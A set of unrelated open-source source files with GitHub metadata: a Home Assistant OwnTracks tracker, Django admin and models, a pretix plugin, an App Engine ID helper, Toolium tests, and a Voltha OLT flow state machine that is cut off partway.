'Unable to parse payload as JSON: %s', payload)
return
if not isinstance(data, dict) or data.get('_type') != 'transition':
return
# check if in "home" fence or other zone
location = ''
if data['event'] == 'enter':
if data['desc'].lower() == 'home':
location = STATE_HOME
else:
location = data['desc']
elif data['event'] == 'leave':
location = STATE_NOT_HOME
else:
            logging.getLogger(__name__).error(
                'Malformed MQTT message: _type=transition, unsupported event=%s',
                data['event'])
return
parts = topic.split('/')
kwargs = {
'dev_id': '{}_{}'.format(parts[1], parts[2]),
'host_name': parts[1],
'gps': (data['lat'], data['lon']),
'location_name': location,
}
if 'acc' in data:
kwargs['gps_accuracy'] = data['acc']
see(**kwargs)
use_events = config.get(CONF_TRANSITION_EVENTS)
if use_events:
mqtt.subscribe(hass, EVENT_TOPIC, owntracks_event_update, 1)
else:
mqtt.subscribe(hass, LOCATION_TOPIC, owntracks_location_update, 1)
return True
|
{
"content_hash": "effaf2392f2853fc8a19fcaac0109083",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 75,
"avg_line_length": 29.943396226415093,
"alnum_prop": 0.5422180214240706,
"repo_name": "sfam/home-assistant",
"id": "e1b0e1de306b0bbe15c12524552ee6b6f9e4f300",
"size": "3174",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/device_tracker/owntracks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1338771"
},
{
"name": "Python",
"bytes": "1400448"
},
{
"name": "Shell",
"bytes": "4573"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from django.contrib.gis import admin as gis_admin
from geo.models import Region, Place
class RegionAdmin(gis_admin.OSMGeoAdmin):
point_zoom = 11
list_display = ['name', 'parent', 'level', 'description', 'code', 'iso3']
fields = ['name', 'level', 'description', 'code', 'iso3', 'border']
search_fields = ['name', 'code']
list_filter = ['feature_code', 'level']
admin.site.register(Region, RegionAdmin)
class PlaceAdmin(gis_admin.OSMGeoAdmin):
def queryset(self, request):
return super(PlaceAdmin, self).queryset(request).prefetch_related('parent')
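    # NOTE: Django 1.6 renamed this hook to get_queryset(); the queryset()
    # spelling above targets older releases.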
point_zoom = 11
list_display = ['name', 'feature_code']
search_fields = ['name']
list_filter = ['feature_code']
raw_id_fields = ('parent', )
admin.site.register(Place, PlaceAdmin)
|
{
"content_hash": "385ead0744d0d05721f62b1180fc5c08",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 83,
"avg_line_length": 29.321428571428573,
"alnum_prop": 0.6699147381242387,
"repo_name": "jleivaizq/freesquare",
"id": "ff17bca8b5ffae697c34faf78d5e62fd85f578b8",
"size": "846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "freesquare/geo/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "223"
},
{
"name": "JavaScript",
"bytes": "1205"
},
{
"name": "Python",
"bytes": "56902"
}
],
"symlink_target": ""
}
|
from django.core.urlresolvers import reverse, resolve
from django.dispatch import receiver
from django.utils.translation import ugettext_lazy as _
from pretix.base.signals import register_payment_providers
from pretix.control.signals import nav_event
from .payment import BankTransfer
@receiver(register_payment_providers)
def register_payment_provider(sender, **kwargs):
return BankTransfer
@receiver(nav_event)
def control_nav_import(sender, request=None, **kwargs):
url = resolve(request.path_info)
if not request.eventperm.can_change_orders:
return []
return [
{
'label': _('Import bank data'),
'url': reverse('plugins:banktransfer:import', kwargs={
'event': request.event.slug,
'organizer': request.event.organizer.slug,
}),
'active': (url.namespace == 'plugins:banktransfer' and url.url_name == 'import'),
'icon': 'upload',
}
]
|
{
"content_hash": "a9fbe0cfc442ad824e2f3f93eca275eb",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 93,
"avg_line_length": 31.483870967741936,
"alnum_prop": 0.6577868852459017,
"repo_name": "Unicorn-rzl/pretix",
"id": "634bbcd4a0ee3b8eb6c8a68f1219f6bd25de7068",
"size": "976",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/pretix/plugins/banktransfer/signals.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "39129"
},
{
"name": "HTML",
"bytes": "153518"
},
{
"name": "JavaScript",
"bytes": "8986"
},
{
"name": "Makefile",
"bytes": "423"
},
{
"name": "Python",
"bytes": "593486"
},
{
"name": "Shell",
"bytes": "287"
}
],
"symlink_target": ""
}
|
"""Get the App Engine app ID from environment.
Not to be confused with `google.appengine.api.app_identity.get_application_id()`
which gets a "display" app ID.
"""
import os
from typing import MutableMapping, Text, Optional
OsEnvironLike = Optional[MutableMapping[Text, Text]]
def get(environ: OsEnvironLike = None) -> str:
"""Get the application ID from the environment.
Args:
environ: Environment dictionary. Uses os.environ if `None`.
Returns:
Default application ID as a string.
We read from the environment GAE_APPLICATION.
"""
if environ is None:
environ = os.environ
return environ.get('GAE_APPLICATION', '')
def put(app_id: str, environ: OsEnvironLike = None):
"""Set the application ID in the environment.
Args:
app_id: Application ID as a string.
environ: Environment dictionary. Uses os.environ if `None`.
"""
if environ is None:
environ = os.environ
environ['GAE_APPLICATION'] = app_id
def clear(environ: OsEnvironLike = None):
"""Unset the application ID in the environment.
Args:
environ: Environment dictionary. Uses os.environ if `None`.
"""
if environ is None:
environ = os.environ
environ.pop('GAE_APPLICATION', None)
_PARTITION_SEPARATOR = '~'
_DOMAIN_SEPARATOR = ':'
def parse(app_id: Optional[str] = None,
environ: OsEnvironLike = None):
"""Parses a full app ID into `partition`, `domain_name`, and `display_app_id`.
Args:
app_id: The full partitioned app ID. Looks up from environ if `None`.
environ: Environment dictionary. Uses os.environ if `None`.
Returns:
A tuple `(partition, domain_name, display_app_id)`. The partition and
domain name might be empty.
"""
if app_id is None:
app_id = get(environ)
partition = ''
psep = app_id.find(_PARTITION_SEPARATOR)
if psep > 0:
partition = app_id[:psep]
app_id = app_id[psep+1:]
domain_name = ''
dsep = app_id.find(_DOMAIN_SEPARATOR)
if dsep > 0:
domain_name = app_id[:dsep]
app_id = app_id[dsep+1:]
return partition, domain_name, app_id
def project_id(app_id: Optional[str] = None,
environ: OsEnvironLike = None):
"""Parses the domain prefixed project ID from the app_id.
Args:
app_id: The full partitioned app ID. Looks up from environ if `None`.
environ: Environment dictionary. Uses os.environ if `None`.
  Returns:
    The project ID as a string: the display app ID, prefixed with the
    domain name and `:` when a domain name is present.
"""
_, domain_name, display_app_id = parse(app_id, environ)
if domain_name:
return f'{domain_name}{_DOMAIN_SEPARATOR}{display_app_id}'
return display_app_id
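# A minimal usage sketch (hypothetical app IDs, following the parsing rules
# implemented above: an optional partition before '~', an optional domain
# before ':'):
#
#   parse('s~example.com:demo-app')      -> ('s', 'example.com', 'demo-app')
#   parse('demo-app')                    -> ('', '', 'demo-app')
#   project_id('s~example.com:demo-app') -> 'example.com:demo-app'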
|
{
"content_hash": "e3b4c2845245629ab0e9dc2fd5c9148b",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 80,
"avg_line_length": 25.304761904761904,
"alnum_prop": 0.6751975912683478,
"repo_name": "GoogleCloudPlatform/appengine-python-standard",
"id": "00f256bf11d82322782220d4f0b2f3f85baf43a5",
"size": "3257",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/google/appengine/api/full_app_id.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3778254"
}
],
"symlink_target": ""
}
|
"""
Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U.
This file is part of Toolium.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mock
import pytest
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement
from toolium.driver_wrapper import DriverWrapper
from toolium.driver_wrappers_pool import DriverWrappersPool
from toolium.pageelements import PageElement, Text, InputText, Button, Select, Group
from toolium.pageelements import select_page_element
from toolium.pageobjects.page_object import PageObject
child_element = 'child_element'
mock_element = None
def get_mock_select():
# Mock text property
mock_prop_text = mock.PropertyMock(return_value='option value')
mock_text = mock.MagicMock()
type(mock_text).text = mock_prop_text
# Mock first_selected_option property
mock_prop_option = mock.PropertyMock(return_value=mock_text)
mock_option = mock.MagicMock()
type(mock_option).first_selected_option = mock_prop_option
# Mock select
mock_select = mock.MagicMock(return_value=mock_option)
return mock_select
class Menu(Group):
logo = PageElement(By.ID, 'image')
class LoginPageObject(PageObject):
title = Text(By.ID, 'title')
username = InputText(By.XPATH, '//input[0]')
password = InputText(By.ID, 'password')
language = Select(By.ID, 'language')
login = Button(By.ID, 'login')
menu = Menu(By.ID, 'menu')
username_shadowroot = InputText(By.XPATH, '//input[1]', shadowroot='shadowroot_css')
@pytest.fixture
def driver_wrapper():
# Create a mock element
global mock_element
mock_element = mock.MagicMock(spec=WebElement)
mock_element.find_element.return_value = child_element
mock_element.text = 'text value'
mock_element.get_attribute.return_value = 'input text value'
# Reset wrappers pool values
DriverWrappersPool._empty_pool()
DriverWrapper.config_properties_filenames = None
# Create a new wrapper
driver_wrapper = DriverWrappersPool.get_default_wrapper()
driver_wrapper.driver = mock.MagicMock()
driver_wrapper.is_mobile_test = mock.MagicMock(return_value=False)
return driver_wrapper
def test_locator(driver_wrapper):
page_object = LoginPageObject(driver_wrapper)
assert page_object.title.locator == (By.ID, 'title')
assert page_object.username.locator == (By.XPATH, '//input[0]')
assert page_object.password.locator == (By.ID, 'password')
assert page_object.language.locator == (By.ID, 'language')
assert page_object.login.locator == (By.ID, 'login')
assert page_object.menu.locator == (By.ID, 'menu')
assert page_object.menu.logo.locator == (By.ID, 'image')
# Check that elements inside a group have the group as parent
assert page_object.menu.logo.parent == page_object.menu
def test_get_text(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
title_value = LoginPageObject().title.text
assert title_value == 'text value'
def test_get_input_text(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
username_value = LoginPageObject().username.text
assert username_value == 'input text value'
def test_set_input_text(driver_wrapper):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = mock_element
driver_wrapper.is_ios_test = mock.MagicMock(return_value=False)
LoginPageObject().username.text = 'new input value'
mock_element.send_keys.assert_called_once_with('new input value')
def test_set_input_text_shadowroot(driver_wrapper):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = mock_element
driver_wrapper.is_ios_test = mock.MagicMock(return_value=False)
text_value = 'new input value'
expected_script = 'return document.querySelector("shadowroot_css").shadowRoot.querySelector("//input[1]").value ' \
'= "new input value"'
LoginPageObject().username_shadowroot.text = text_value
mock_element.send_keys.assert_not_called()
driver_wrapper.driver.execute_script.assert_called_once_with(expected_script)
def test_set_input_text_shadowroot_quotation_marks(driver_wrapper):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = mock_element
driver_wrapper.is_ios_test = mock.MagicMock(return_value=False)
text_value = 'new "input" value'
expected_script = 'return document.querySelector("shadowroot_css").shadowRoot.querySelector("//input[1]").value ' \
'= "new \\"input\\" value"'
LoginPageObject().username_shadowroot.text = text_value
mock_element.send_keys.assert_not_called()
driver_wrapper.driver.execute_script.assert_called_once_with(expected_script)
def test_get_selected_option(driver_wrapper):
select_page_element.SeleniumSelect = get_mock_select()
option = LoginPageObject().language.option
assert option == 'option value'
def test_set_option(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
select_page_element.SeleniumSelect = get_mock_select()
LoginPageObject().language.option = 'new option value'
select_page_element.SeleniumSelect.assert_called_once_with(mock_element)
select_page_element.SeleniumSelect().select_by_visible_text.assert_called_once_with('new option value')
def test_click_button(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
LoginPageObject().login.click()
mock_element.click.assert_called_once_with()
def test_group_reset_object(driver_wrapper):
login_page = LoginPageObject()
# Check that web elements are empty
assert login_page.menu._web_element is None
assert login_page.menu.logo._web_element is None
assert login_page.menu.logo.parent == login_page.menu
login_page.menu.logo.web_element
# Check that web elements are filled
assert login_page.menu._web_element is not None
assert login_page.menu.logo._web_element is not None
assert login_page.menu.logo.parent == login_page.menu
login_page.menu.reset_object()
# Check that web elements are empty
assert login_page.menu._web_element is None
assert login_page.menu.logo._web_element is None
assert login_page.menu.logo.parent == login_page.menu
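# These are pytest-style tests; a typical invocation, assuming the module
# lives at its repository path, would be:
#
#   pytest toolium/test/pageelements/test_derived_page_element.py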
|
{
"content_hash": "eba40ae9a6f9199b8d28f45f5db7bbea",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 119,
"avg_line_length": 35.03061224489796,
"alnum_prop": 0.7292455578211476,
"repo_name": "Telefonica/toolium",
"id": "d11724dd2dc4a965803a4336c25c15d1a86a22e0",
"size": "6892",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toolium/test/pageelements/test_derived_page_element.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1301"
},
{
"name": "HTML",
"bytes": "724"
},
{
"name": "JavaScript",
"bytes": "734"
},
{
"name": "Makefile",
"bytes": "2598"
},
{
"name": "Python",
"bytes": "560909"
}
],
"symlink_target": ""
}
|
"""Defines all Student's models.
Many of these modules are admin by Django Admin UI.
"""
from django.db import models
from apps.settings.models import Time
from django.conf import settings
class Grade(models.Model):
"""Grade table class."""
    name = models.CharField(max_length=45, db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_grade'
ordering = ['id']
verbose_name = 'grade'
verbose_name_plural = 'grades'
def __str__(self):
return '%s' % self.name
class Group(models.Model):
"""Group table class."""
    name = models.CharField(max_length=45, db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_group'
ordering = ['id']
verbose_name = 'group'
verbose_name_plural = 'groups'
def __str__(self):
return '%s' % self.name
class Room(models.Model):
"""Room table class."""
    name = models.CharField(max_length=45, db_column='name', null=False, blank=False)
grade = models.ForeignKey(Grade, db_column='grade', on_delete=models.PROTECT)
group = models.ForeignKey(Group, db_column='group', on_delete=models.PROTECT)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_room'
ordering = ['id']
verbose_name = 'room'
verbose_name_plural = 'rooms'
def __str__(self):
return '%s' % self.name
class StudentState(models.Model):
"""StudentState table class."""
    name = models.CharField(max_length=45, db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_student_state'
ordering = ['id']
verbose_name = 'student_state'
verbose_name_plural = 'student_states'
def __str__(self):
return '%s' % self.name
class Student(models.Model):
"""Student table class."""
    name = models.CharField(max_length=45, db_column='name', null=False, blank=False)
    lastname = models.CharField(max_length=45, db_column='lastname', null=False, blank=False)
room = models.ForeignKey(Room, db_column='room', on_delete=models.PROTECT)
note = models.TextField(db_column='note', null=True, blank=True)
state = models.ForeignKey(StudentState, db_column='state', on_delete=models.PROTECT)
user = models.ForeignKey(settings.AUTH_USER_MODEL, db_column='user', on_delete=models.PROTECT)
    date_joined = models.DateField(db_column='date_joined', auto_now_add=True)  # set once when the row is created
def get_name_complete(self):
return '%s %s' % (self.name, self.lastname)
class Meta:
db_table = 'student_student'
ordering = ['id']
verbose_name = 'student'
verbose_name_plural = 'students'
def __str__(self):
return '%s' % self.name
class Subject(models.Model):
"""Subject table class."""
    name = models.CharField(max_length=45, db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
user = models.ManyToManyField(settings.AUTH_USER_MODEL, through='UserHasSubject')
class Meta:
db_table = 'subject_subject'
ordering = ['id']
verbose_name = 'subject'
verbose_name_plural = 'subjects'
def __str__(self):
return '%s' % self.name
class UserHasSubject(models.Model):
"""UserHasSubject table class."""
user = models.ForeignKey(settings.AUTH_USER_MODEL, db_column='user', on_delete=models.PROTECT)
subject = models.ForeignKey(Subject, db_column='subject', on_delete=models.PROTECT)
room = models.ForeignKey(Room, db_column='room', on_delete=models.PROTECT)
class Meta:
db_table = 'subject_user_has_subject'
ordering = ['id']
def __str__(self):
        return 'user %s teaches subject %s in room %s' % (self.user.username, self.subject.name, self.room.name)
class Absence(models.Model):
"""Absence table class."""
value = models.PositiveSmallIntegerField(db_column='value', null=False, blank=False)
time = models.ForeignKey(Time, db_column='time', on_delete=models.PROTECT)
student = models.ForeignKey(Student, db_column='student', on_delete=models.PROTECT)
subject = models.ForeignKey(Subject, db_column='subject', on_delete=models.PROTECT)
user = models.ForeignKey(settings.AUTH_USER_MODEL, db_column='user', on_delete=models.PROTECT)
class Meta:
db_table = 'student_absence'
ordering = ['id']
verbose_name = 'absence'
verbose_name_plural = 'absences'
def __str__(self):
return 'Absence %s' % self.student.name
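# A minimal usage sketch (hypothetical data, not part of this module) showing
# how the relations above chain together:
#
#   student = Student.objects.select_related('room__grade', 'room__group').first()
#   student.get_name_complete()   # '<name> <lastname>'
#   subject.user.all()            # users linked to a Subject through UserHasSubject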
|
{
"content_hash": "d7b2fab342e27aab35d509145045bc2a",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 117,
"avg_line_length": 33.38345864661654,
"alnum_prop": 0.7036036036036036,
"repo_name": "dairdr/notes",
"id": "3cd6a19c14cefa0d9e3c64b7313c993eb3964433",
"size": "4466",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notes/apps/student/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1171"
},
{
"name": "JavaScript",
"bytes": "78418"
},
{
"name": "Python",
"bytes": "66640"
}
],
"symlink_target": ""
}
|
"""
Handles the sequence of messages used to send OMCI to the ONU.
"""
import structlog
from scapy.automaton import ATMT
from voltha.adapters.microsemi_olt.BaseOltAutomaton import BaseOltAutomaton
from voltha.adapters.microsemi_olt.PAS5211 import PAS5211MsgSendFrame, PAS5211MsgGetOltVersionResponse, PAS5211MsgSendFrameResponse, \
PAS5211EventFrameReceived, PAS5211MsgHeader, PAS5211SetVlanGenConfigResponse
from voltha.extensions.omci.omci_frame import OmciFrame
from voltha.adapters.microsemi_olt.PAS5211 import PAS5211GetOnuAllocs, PAS5211GetOnuAllocsResponse, PAS5211GetSnInfo, \
PAS5211GetSnInfoResponse, PAS5211GetOnusRange, PAS5211GetOnusRangeResponse, PAS5211MsgSetOnuOmciPortId, \
PAS5211MsgSetOnuOmciPortIdResponse, PAS5211MsgSetOnuAllocId, PAS5211MsgSetOnuAllocIdResponse, \
PAS5211SetSVlanAtConfig, PAS5211SetSVlanAtConfigResponse, PAS5211SetVlanDownConfig, \
PAS5211SetVlanDownConfigResponse, PAS5211SetDownVlanHandl, PAS5211SetDownVlanHandlResponse, \
PAS5211SetUplinkVlanHandl, PAS5211SetDownstreamPolicingConfigResponse, PAS5211SetDownstreamPolicingConfig, \
PAS5211SetPortIdPolicingConfig, PAS5211UnsetPortIdPolicingConfig, \
PAS5211MsgSendDbaAlgorithmMsg, PAS5211MsgSendDbaAlgorithmMsgResponse, \
PAS5211SetUpstreamPolicingConfigResponse, PAS5211SetUpstreamPolicingConfig, \
PAS5211MsgSetPortIdConfig, PAS5211MsgSetPortIdConfigResponse, \
PAS5211MsgGetOnuIdByPortId, PAS5211MsgGetOnuIdByPortIdResponse, \
PAS5211SetVlanUplinkConfiguration, PAS5211SetVlanUplinkConfigurationResponse, PAS5211SetUplinkVlanHandlResponse, PAS5211SetVlanGenConfig, PAS5211SetVlanGenConfigResponse, \
PAS5211GetPortIdDownstreamPolicingConfig, PAS5211GetPortIdDownstreamPolicingConfigResponse, PAS5211RemoveDownstreamPolicingConfig, \
PAS5211MsgHeader, PAS5211UnsetPortIdPolicingConfigResponse, PAS5211RemoveDownstreamPolicingConfigResponse, \
PAS5211SetPortIdPolicingConfigResponse, PAS5211EventAlarmNotification
from voltha.adapters.microsemi_olt.PAS5211_constants import OMCI_GEM_IWTP_IW_OPT_8021P_MAPPER, PON_FALSE, \
PON_1_TO_1_VLAN_MODE, PON_TRUE, PON_VLAN_UNUSED_TAG, PON_VLAN_UNUSED_PRIORITY, PON_VLAN_REPLACE_PRIORITY, \
PON_OUTPUT_VLAN_PRIO_HANDLE_INCOMING_VLAN, PON_VLAN_UNCHANGED_PRIORITY, PON_OUTPUT_VLAN_PRIO_HANDLE_DONT_CHANGE, \
PON_OUTPUT_VLAN_PRIO_HANDLE_DL_VLAN_TABLE, PON_DL_VLAN_SVLAN_REMOVE, PON_DL_VLAN_CVLAN_NO_CHANGE, \
PON_VLAN_DEST_DATAPATH, GEM_DIR_BIDIRECT, OMCI_MAC_BRIDGE_PCD_LANFCS_FORWARDED, \
OMCI_MAC_BRIDGE_PCD_ENCAP_METHOD_LLC, OMCI_8021P_MSP_UNMARKED_FRAME_TAG_FRAME, OMCI_8021P_MSP_TP_TYPE_NULL, \
OMCI_EX_VLAN_TAG_OCD_ASSOCIATION_TYPE_PPTP_ETH_UNI, OMCI_EX_VLAN_TAG_OCD_DS_MODE_US_INVERSE, PMC_UPSTREAM_PORT, \
PON_DISABLE, PON_VLAN_CHANGE_TAG, PON_VLAN_DONT_CHANGE_TAG, PON_PORT_TYPE_GEM, PON_PORT_DESTINATION_CNI0, PON_ENABLE, SLA_gr_bw_gros, PYTHAGORAS_UPDATE_AID_SLA, \
SLA_gr_bw_gros, SLA_be_bw_gros, SLA_gr_bw_fine, SLA_be_bw_fine, PYTHAGORAS_DBA_DATA_COS, PYTHAGORAS_DBA_STATUS_REPORT_NSR, \
PMC_OFAL_NO_POLICY, UPSTREAM, DOWNSTREAM
from struct import pack, unpack
from voltha.adapters.microsemi_olt.OltRemoveFlowStateMachine import OltRemoveFlowStateMachine
log = structlog.get_logger()
MAX_RETRIES = 10
TIMEOUT = 5
class OltInstallFlowStateMachine(BaseOltAutomaton):
onu_id = None
channel_id = None
port_id = None
onu_session_id = None
alloc_id = None
policy_id = None
retries = 0
def parse_args(self, debug=0, store=0, **kwargs):
self.onu_id = kwargs.pop('onu_id')
self.channel_id = kwargs.pop('channel_id')
self.port_id = kwargs.pop('port_id')
self.onu_session_id = kwargs.pop('onu_session_id')
self.alloc_id = kwargs.pop('alloc_id')
self.svlan_id = kwargs.pop('svlan_id')
self.cvlan_id = kwargs.pop('cvlan_id')
self.uplink_bandwidth = kwargs.pop('uplink_bandwidth')
self.downlink_bandwidth = kwargs.pop('downlink_bandwidth')
BaseOltAutomaton.parse_args(self, debug=debug, store=store, **kwargs)
    def master_filter(self, pkt):
        if not super(OltInstallFlowStateMachine, self).master_filter(pkt):
            return False
        # Accept only PAS5211 frames addressed to this channel/ONU that are not
        # alarms, OLT version responses, OMCI frames or send-frame responses.
        return (PAS5211MsgHeader in pkt
                and PAS5211EventAlarmNotification not in pkt
                and PAS5211MsgGetOltVersionResponse not in pkt
                and pkt[PAS5211MsgHeader].channel_id == self.channel_id
                and pkt[PAS5211MsgHeader].onu_id == self.onu_id
                and OmciFrame not in pkt
                and PAS5211MsgSendFrameResponse not in pkt)
"""
States
"""
# Uplink states...
@ATMT.state(initial=1)
def send_msg(self):
log.debug('olt-flow-state-machine-start')
@ATMT.state()
def wait_set_gen_vlan_uplink_configuration_response(self):
pass
@ATMT.state()
def wait_set_port_id_configuration_response(self):
pass
@ATMT.state()
def wait_get_onu_id_by_port_id_response(self):
pass
@ATMT.state()
def wait_send_dba_algorithm_msg_response(self):
pass
@ATMT.state()
def wait_set_svlan_at_configuration_response(self):
pass
@ATMT.state()
def wait_set_vlan_uplink_configuration_response(self):
pass
@ATMT.state()
def wait_set_uplink_vlan_handling_response(self):
pass
# Downlink states...
@ATMT.state()
def wait_set_gen_vlan_downlink_configuration_response(self):
pass
@ATMT.state()
def wait_set_vlan_downlink_configuration_response(self):
pass
@ATMT.state()
def wait_set_downlink_vlan_handling_response(self):
pass
@ATMT.state()
def wait_get_port_id_downlink_policing_response(self):
pass
@ATMT.state()
def wait_unset_port_id_downlink_policing_response(self):
pass
@ATMT.state()
def wait_remove_downlink_policing_response(self):
pass
@ATMT.state()
def wait_set_downlink_policing_response(self):
pass
@ATMT.state()
def wait_set_port_id_policing_response(self):
pass
@ATMT.state(error=1)
def error(self, msg):
log.error(msg)
# # If any error, we remove the flow...
# olt = OltRemoveFlowStateMachine(iface=self.iface, comm=self.comm,
# target=self.target, device=self.device, onu_id=self.onu_id,
# channel_id=self.channel_id, port_id=self.port_id, onu_session_id=self.onu_session_id,
# alloc_id=self.alloc_id)
# olt.runbg()
raise self.end()
@ATMT.state(final=1)
def end(self):
log.debug('olt-flow-state-machine-end')
# pass
"""
Utils
"""
def px(self, pkt):
return self.p(pkt, channel_id=self.channel_id,
onu_id=self.onu_id,
onu_session_id=self.onu_session_id)
"""
Transitions
"""
@ATMT.condition(send_msg)
def install_flow(self):
log.debug("install-flow")
self.send_set_gen_vlan_uplink_configuration(self.device.device)
raise self.wait_set_gen_vlan_uplink_configuration_response()
@ATMT.timeout(wait_set_gen_vlan_uplink_configuration_response, TIMEOUT)
def timeout_wait_gen_vlan_uplink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_gen_vlan_uplink_configuration(self.device.device)
else:
raise self.error("Timeout for message PAS5211SetVlanGenConfigResponse")
@ATMT.receive_condition(wait_set_gen_vlan_uplink_configuration_response)
def wait_for_set_gen_vlan_uplink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanGenConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanGenConfigResponse')
self.send_set_port_id_configuration(self.device.device, PON_ENABLE, self.port_id, self.alloc_id)
raise self.wait_set_port_id_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_port_id_configuration_response, TIMEOUT)
def timeout_wait_set_port_id_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_port_id_configuration(self.device.device, PON_ENABLE, self.port_id, self.alloc_id)
else:
raise self.error("Timeout for message PAS5211MsgSetPortIdConfigResponse")
@ATMT.receive_condition(wait_set_port_id_configuration_response)
def wait_for_set_port_id_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211MsgSetPortIdConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211MsgSetPortIdConfigResponse')
self.send_get_onu_id_by_port_id(self.device.device, self.port_id)
raise self.wait_get_onu_id_by_port_id_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_get_onu_id_by_port_id_response, TIMEOUT)
def timeout_wait_get_onu_id_by_port_id_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_get_onu_id_by_port_id(self.device.device, self.port_id)
else:
raise self.error("Timeout for message PAS5211MsgGetOnuIdByPortIdResponse")
@ATMT.receive_condition(wait_get_onu_id_by_port_id_response)
def wait_for_get_onu_id_by_port_id_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211MsgGetOnuIdByPortIdResponse in pkt:
log.debug('[RESPONSE] PAS5211MsgGetOnuIdByPortIdResponse')
self.send_send_dba_algorithm_msg(self.device.device, self.port_id, self.uplink_bandwidth)
raise self.wait_send_dba_algorithm_msg_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_send_dba_algorithm_msg_response, TIMEOUT)
def timeout_wait_send_dba_algorithm_msg_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_send_dba_algorithm_msg(self.device.device, self.port_id, self.uplink_bandwidth)
else:
raise self.error("Timeout for message PAS5211MsgSendDbaAlgorithmMsgResponse")
@ATMT.receive_condition(wait_send_dba_algorithm_msg_response)
def wait_for_send_dba_algorithm_msg_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211MsgSendDbaAlgorithmMsgResponse in pkt:
log.debug('[RESPONSE] PAS5211MsgSendDbaAlgorithmMsgResponse')
self.send_set_svlan_at_configuration(self.device.device, self.svlan_id)
raise self.wait_set_svlan_at_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_svlan_at_configuration_response, TIMEOUT)
def timeout_wait_set_svlan_at_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_svlan_at_configuration(self.device.device, self.svlan_id)
else:
raise self.error("Timeout for message PAS5211SetSVlanAtConfigResponse")
@ATMT.receive_condition(wait_set_svlan_at_configuration_response)
def wait_for_set_svlan_at_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetSVlanAtConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetSVlanAtConfigResponse')
self.send_set_vlan_uplink_configuration(self.device.device, self.port_id)
raise self.wait_set_vlan_uplink_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_vlan_uplink_configuration_response, TIMEOUT)
def timeout_wait_set_vlan_uplink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_vlan_uplink_configuration(self.device.device, self.port_id)
else:
raise self.error("Timeout for message PAS5211SetVlanUplinkConfigurationResponse")
@ATMT.receive_condition(wait_set_vlan_uplink_configuration_response)
def wait_for_set_vlan_uplink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanUplinkConfigurationResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanUplinkConfigurationResponse')
